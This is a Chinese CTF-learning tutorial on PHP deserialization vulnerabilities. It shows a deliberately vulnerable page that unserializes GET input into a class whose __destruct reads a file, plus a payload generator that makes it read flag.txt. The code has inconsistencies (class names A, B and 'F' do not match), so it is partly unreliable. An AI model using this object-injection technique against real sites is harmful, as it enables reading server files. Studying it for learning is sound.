0x0001自诉
之前在打ctf的时候,有一题是利用反序列化漏洞完成的,然而学艺不精,于是跑去学习反序列化漏洞。0x0002关于序列化与反序列化以及漏洞的原因
序列化是将对象的状态信息转换为可以存储或传输的形式的过程 代码为: `serialize ( mixed $value )`反序列化则相反,代码为:unserialize ( string $str )
如果只是这样,那么应该没有什么可以利用的漏洞。
然鹅,serialize ( mixed $value )
与unserialize ( string $str )
这两个函数在使用时,会自动使用一些魔法函数,以及,如果在定义的类内存在魔法函数,也会自动调用
0x0003实例
首先构建一个序列化<?php
class A{
public $filename='F:\\phpstudy\\PHPTutorial\\WWW\\php\\a.txt';
}
$a = new A();
echo $a->filename.'<br />';
?>
结果
那么,我们再加一个函数 __destruct ()呢
<?php
class A{
public $filename='F:\\phpstudy\\PHPTutorial\\WWW\\php\\a.txt';
function __destruct(){
$data = readfile($this->filename);
echo $data;
}
}
$a = new A();
echo $a->filename.'<br />';
?>
图中yinhui为内容,6是长度
会发生这样的事情是因为 __destruct 析构函数在一个类对象消失时, 会自动执行。
那么假设,其中其实还有一个反序列化函数
<?php
class A{
public $filename='F:\\phpstudy\\PHPTutorial\\WWW\\php\\a.txt';
function __destruct(){
$data = readfile($this->filename);
echo $data;
}
}
$a = new A();
echo $a->filename.'<br />';
$b = unserialize($_GET[a]);
?>
然后我们通过下列代码来序列化一个路径
<?php
classB{
public $filename='a.txt';
}
$a = new B();
$a->filename = 'F:\\phpstudy\\PHPTutorial\\WWW\\php\\flag.txt';
echo serialize($a);
?>
获得了:O:1:“F”:1:{s:8:“filename”;s:40:“F:\phpstudy\PHPTutorial\WWW\php\flag.txt”;}
再放到拥有反序列化函数的网页中运行
看,我们的flag文件也被读出来了